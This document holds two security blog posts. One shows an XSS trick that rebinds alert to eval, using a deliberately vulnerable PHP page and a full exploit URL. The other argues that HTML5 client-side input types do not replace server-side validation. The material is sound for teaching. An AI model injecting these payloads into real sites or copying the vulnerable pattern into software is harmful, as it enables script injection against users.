Neat XSS Trick

I just learned a neat XSS trick from a blog post by Andy Wingo. This is old news to the more proficient web application testers among my readers, but it was new to me and I like it. I wasn’t aware that one could redirect function calls in JavaScript so easily:

somefunction = otherfunction;

somewhere in a script makes somefunction a reference to otherfunction. This works with functions of the built-in API, too, so any function can become eval:

alert = eval;

or

window.alert = eval;
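To see this rebinding at work outside a browser, here is a minimal sketch with ordinary functions standing in for the built-ins (the function names are mine, chosen for illustration):

```javascript
// An identifier bound to one function can simply be rebound to
// another. The call site stays the same, but the behavior changes,
// just as with alert = eval in the browser.
function greet(s) { return "Hello, " + s; }
function shout(s) { return s.toUpperCase() + "!"; }

let result1 = greet("world");   // uses the original function

greet = shout;                  // redirect the identifier
let result2 = greet("world");   // same call site, new behavior

console.log(result1);           // "Hello, world"
console.log(result2);           // "WORLD!"
```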

So if you can inject a small amount of script somewhere, and a function parameter elsewhere, you can turn the function that happens to be called into the eval you need. This PHP fragment illustrates the approach:

<?php
// XSS vulnerability limited to 35 characters
print substr($_GET["inject1"], 0, 35);
?>

<script>
// URL parameter goes into a seemingly harmless function - which we
// can redefine to become eval
<?php $alertparam = htmlspecialchars(addslashes($_GET["inject2"]), ENT_COMPAT); ?>
alert('<?=$alertparam?>');
</script>

The first PHP block allows up to 35 characters to be injected into the page unfiltered through the inject1 URL parameter, just enough to add this statement to the page:

<script>alert=eval;</script>

or

<script>window.alert=eval;</script>

The second block embeds the value of the inject2 URL parameter in JavaScript as the argument of alert() after some (imperfect) escaping. This parameter has no length limit, but it ends up in a seemingly harmless function, until somebody swaps out the function behind the identifier alert.
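A small sketch of why that swap matters: the same user-supplied string is harmless while the sink function merely displays it, and becomes executable the moment the identifier is rebound to eval. (Here sink is my hypothetical stand-in for alert, so the example runs outside a browser.)

```javascript
// The page passes a user-supplied STRING to some sink function.
// Harmless while the sink just displays the string -- dangerous
// once the identifier has been rebound to eval.
let sink = function (s) { return "displayed: " + s; };

const payload = "6 * 7";        // stands in for attacker-controlled input

let before = sink(payload);     // the string is merely shown

sink = eval;                    // what inject1 does to alert
let after = sink(payload);      // the same string now executes

console.log(before);            // "displayed: 6 * 7"
console.log(after);             // 42
```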

To see it work, put the PHP code on your web server and call it with a URL like this:

xss.php?inject1=<script>window.alert=eval;</script>&inject2=prompt('Did you expect this? (Yes/No)');

This works fine with Firefox 9 and, if the XSS filter is disabled, with IE 9. Safari 5.1.2 silently blocks the exploit and tells me about it only in debug mode. If you really need to, you’ll probably find an evasion technique against client-side XSS filters. IE seems to require window.alert, while Firefox is happy with plain alert in inject1.

Will HTML 5 Promote Insecure Programming? Maybe not.

A few days ago the W3C published the first draft of HTML 5. One of the many new features struck me as a possible amplifier for insecure programming: HTML 5 extends the type attribute of the input element to support URLs, e-mail addresses, date, time, and other types. The rationale for the new types reads (emphasis by me):

»The idea of these new types is that the user agent can provide the user interface, such as a calendar date picker or integration with the user’s address book and submit a defined format to the server. It gives the user a better experience as his input is checked before sending it to the server meaning there is less time to wait for feedback.«

Now this is a really old theme in Web (in)security. The Web as a programming platform invites errors in input validation and sanitization by giving the programmer equally powerful tools for two different domains of trust, the client and the server. Client-side input validation does make sense and is desirable for usability, but it cannot replace server-side enforcement.

Consequently, one all too common mistake in Web application programming is to validate or sanitize data on the client side but not on the server side, where one must not rely on any assumptions about client behavior. At first glance, the extensions mentioned above seem to provoke even more of these mistakes by improving the client-side features and thus making them more attractive.
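For illustration, here is a minimal server-side sketch (the helper names are hypothetical, not from any framework) of the rule that the server must re-validate even values the browser already checked through one of the new input types:

```javascript
// Even if the form used <input type="email"> and the browser already
// validated the value, the server must re-check it, because requests
// can be crafted directly without any browser involved.
function isPlausibleEmail(value) {
  // Deliberately simple check for illustration only; a real
  // application would use a vetted validation library.
  return typeof value === "string" && /^[^\s@]+@[^\s@]+\.[^\s@]+$/.test(value);
}

function handleSignup(params) {
  if (!isPlausibleEmail(params.email)) {
    return { status: 400, error: "invalid email" };  // enforced server-side
  }
  return { status: 200 };
}

console.log(handleSignup({ email: "alice@example.com" }).status); // 200
console.log(handleSignup({ email: "<script>" }).status);          // 400
```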

The new feature makes generating code easier, though, which means it may become easier to develop and use frameworks instead of hand-coding. This would be good, security-wise, as one framework usually makes fewer errors than hundreds or thousands of programmers.

At this time, both theories seem equally plausible to me. Empirical studies, anyone?